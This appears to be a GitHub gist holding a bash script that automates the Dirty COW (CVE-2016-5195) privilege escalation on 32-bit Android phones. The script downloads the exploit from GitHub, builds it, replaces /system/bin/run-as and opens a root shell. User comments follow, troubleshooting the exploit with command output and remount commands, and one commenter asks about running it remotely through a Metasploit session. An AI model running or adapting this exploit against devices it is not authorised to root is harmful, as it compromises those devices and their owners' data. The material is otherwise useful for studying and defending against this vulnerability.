"Root" via dirtyc0w privilege escalation exploit (automation script) / Android (32 bit)

root.sh

#!/bin/bash

# Give the usual warning.
clear;
echo "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;

# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";
workspacezip="dirtyc0w_workspace.zip";
workspace="dirtyc0w_workspace";
rm -f $workspacezip > /dev/null; # Remove zip if it exists
rm -rf $workspace > /dev/null; # Remove workspace if it exists
wget -O dirtyc0w_workspace.zip https://github.com/Arinerron/CVE-2016-5195/archive/master.zip > /dev/null 2>&1;
if [ -f $workspacezip ];
then
    echo "[INFO] Extracting exploit files...";
    unzip -a $workspacezip -d $workspace > /dev/null;
    rm -f $workspacezip; # Remove zip if it exists
else
   echo "[ERR] Failed to download exploit files.";
   exit 1;
fi;
if [ -d $workspace ];
then
    cd $workspace;
    directory=$PWD; # thx @tomdeboer!
    cd CVE-2016-5195-master;
else
    echo "[ERR] Failed to extract exploit files.";
    exit 1;
fi;

# Compile and send exploit.
echo "[INFO] Exploiting dirtyc0w vulnerability...";
sleep 1; # Let them read the message before chaos
make root;
clear;

# Hooray!
echo -n "[INFO] Complete. Installed package \"run-as\" on device.\n[INFO] Cleaning up workspace...";
rm -rf $directory; # Clean up workspace
echo "Done";
echo "[INFO] Starting shell in 3 seconds...";
sleep 3; # Look, it worked!
adb shell;
clear;
exit 0;

Cool, got that... now where do I go from here exactly? http://imgur.com/a/0rHeI

@Arinerron

i got run-as on, my phone, but if i try to do anything with it i get permission denied. Has anyone been able to run things as root with this? My phone doesn't have a way to unlock the bootloader, could that have something to do with it?

Is this only for 32-bit Android phones?

Heh, here we go.

@RaPoZaUm Probably would work, but I haven't tested it.
@kirbyfan64 Yup
@MF064DD It should have installed a binary called run-as. You can open a terminal emulator on your phone and run stuff like run-as echo "pwned" > root_only_file.txt and write to it as root.
@cmwedin Sorry it isn't working. It might be that the binary is built for a 32-bit arch and your phone is 64. You can configure that. See my comment above. If it doesn't work, please report it here: https://github.com/timwr/CVE-2016-5195/issues Thanks!
@pvineeth The script is only built for 32-bit phones right now. You can exploit 64-bit phones though, too. See my comment above for more info.

Anyone has any idea what to use on the argument of run-as ?

1|shell@peregrine:/ $ run-as                                                   
Usage: run-as <package-name> <command> [<args>]

edit: I found what goes on package-name, this will give you a list of options

pm list packages -f

but... it doesn't work, example:

1|shell@peregrine:/ $ run-as com.google.android.apps.photos ls                 
run-as: Package 'com.google.android.apps.photos' is not debuggable

@Arinerron my phone is 32 bit :/

It won't work anyway. The exploit in question can't run anything out of it's normal context, because SE for Android will catch it (darn you SELinux, ruining my dreams constantly since 1998), and the child/fork will run with standard UID. I tried to run sh with system() and execp(), I tried to chown() it to root:root, and SUID/GUID it with chmod(). Nothing works. I think that editing an existing binary with SUID toggled might work, but I didn't tried it - too much hassle for me, and generating a custom payload to do this is a bitch of a task, for someone who doesn't know the architecture.

Have you taken into account that run-as is meant to give you different privileges and therefore would work within it's threshold (SE-wise)?
I think it still could work with the correct run-as binary, not yet tested myself, though.

Arinerron please do (automation script) to 64 bit. I tried to modify the way you showed it but I could not get ...I have a backup TA partition for my Sony XA Ultra make via dirtyc0w escalation exploit. Now I need to exploit to root but I did not get, please help me

Hello, sorry if I'm not an expert, but when I execut "run-as" it shows:
running as uid 2000
uid 0
When I type " ls /data/app " it says Permission denied, what I need to do?

Will this work on Doogee X9 Pro or I will brick my device with this? Will this script install SuperSU or I must manually download it?

@pvineeth @MrMino @tinxx @garikay @Pcmster @Buranek

If you're tech-savvy (I assume you are since you are using GitHub), I made a more "hands on" tutorial here. :)

@MF064DD Sorry for the late response. Type adb shell, then run-as. You now are root on your phone.

Good luck! If that doesn't work, feel free to @mention me and I'll see if I can help.

I'm trying to use this to root a B&O Horizon running Android 5.1.1, and it doesn't seem to work. When I do run-as in adb shell I get this:

1|shell@bno_MT5593Uplus_EU:/ $ run-as
Usage: run-as <package-name> <command> [<args>]

If I try to run any package with run-as, it says run-as: Package '[ ]' is not debuggable. I've tried own packages, already installed packages, official and unofficial packages.

Any thoughts @Arinerron ?

I tried using this on LG G3 (with armeabi-v7a version), but I get this error:

could not open /system/bin/run-as

And run-as command gives me this:

run-as: can't execute: Permission denied

Anybody has any suggestions?

@Arinerron Is there anyway to do this WITHOUT modifying files on the system partition? I mean, if you can use this exploit to replace /system/bin/run-as, then surely you can use it to do things that you'd use the new /system/bin/run-as to do, right?

nice

@Arinerron setresgid/setresuid failed on my Note 5 arm64-v8a .. I don't really know where to begin to fix that but if I could get some elevation I could have some real fun. I am a programmer, just not an Android wizard.

Hi @Arinerron,
I installed the run-as successfully. However, it still does not allow to write the file.

shell@P1a42:/ # echo "pwned" > root_only_file.txt
/system/bin/sh: can't create root_only_file.txt: Read-only file system

Is there any extra steps to take it work?

Hi, @thaomvs

to need remount file system on write
example
http://android.stackexchange.com/questions/110927/how-to-mount-system-rewritable-or-read-only-rw-ro

@thaomvs Sorry about the late reply-- Simply executing run-as switches to the root user.

Once i gain root acces i can't remount system for installing su binnary,
`# adb shell

athene_f:/ $ run-as

uid run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0

athene_f:/ # whoami

root

athene_f:/ # mount -o rw,remount /system
'/dev/block/bootdevice/by-name/system' is read-only
mount: '/dev/block/bootdevice/by-name/system'->'/system': Permission denied
1|athene_f:/ #
`
Any idea why?
I followed your guide
Root Android 32-bit / Guide
Prerequisites

Linux machine with
    adb
    android-ndk
    gcc
32-bit Android device plugged in to computer

Steps

Download the exploit from here.
Extract the zip file
Enter the extracted zip's directory in Terminal
Run the following command:

make root && adb shell;

and my phone is a 32bits

Thanks

@Arinerron i have read thru the comments and i have a question.
installing "run-as" on android trough this script will allow me to say start FX File manager with root permissions and then i can delete/remove system apps? correct?

@sevenup30 Try remounting /system using this command: mount -o rw,remount /dev/block/bootdevice/by-name/system /system
@sick13 Yes, correct. That should work.

@m4hmoud Sorry again for the late reply. Dirtycow was from last November-ish. Do you know if your system already patched?

hi, I've done all the steps, but don't get any info instead of exploited.

• [*] size 14192
• [*] mmap 0x7f7f3c5000
• [*] currently 0x7f7f3c5000=10102464c457f
• [*] using /proc/self/mem method
• [*] madvise = 0x7f7f3c5000 14192
• [*] madvise = 0 16777216
• [*] /proc/self/mem 142459296 10038
• [*] exploited 0 0x7f7f3c5000=10102464c457f
  no any info here

@20esaua After run this command : mount -o rw,remount /dev/block/bootdevice/by-name/system /system
Terminal prompt hangs. It does not give any output or error

Is there something we have to write in place of "by-name"

So this Script installs a Custom Version of run-as? Do i lose my guarantee if i use this Script?

@Arinerron Hello! I am very new to Github, It is my first comment. Just signed up and wanna ask you something, I came to know about this vulnerability but I was working on Metasploit and somehow find that video where it shows gaining root privilege remotely through metasploit just have to open USB DEBUGGING and run this root.sh on android mobile /sdcard dir.

So my question is as I am facing the same error that the files fails to download from github when I run the script on metasploit session, But when I run it on the directory where SDK is installed it works but says no emulated or android devices connected obviously.

I just downloaded SDK manually and extracted in Home directory but when ever I try to run the script it on metasploit session it fails to download from Github.

Can you please simplify my issue for me? just straight forwardly wanna know is it possible to gain acces remotely without devices being connected through USB and have this root.sh running and getting root privilege ? If yes than how can I use those manual step you provided as I can't connect the device I wanna try it on Metasploit...

@Arinerron Can you use this on a TV arch?
Running ARM-v7-A. Hisilicon chip.
Android 7.0 Nougat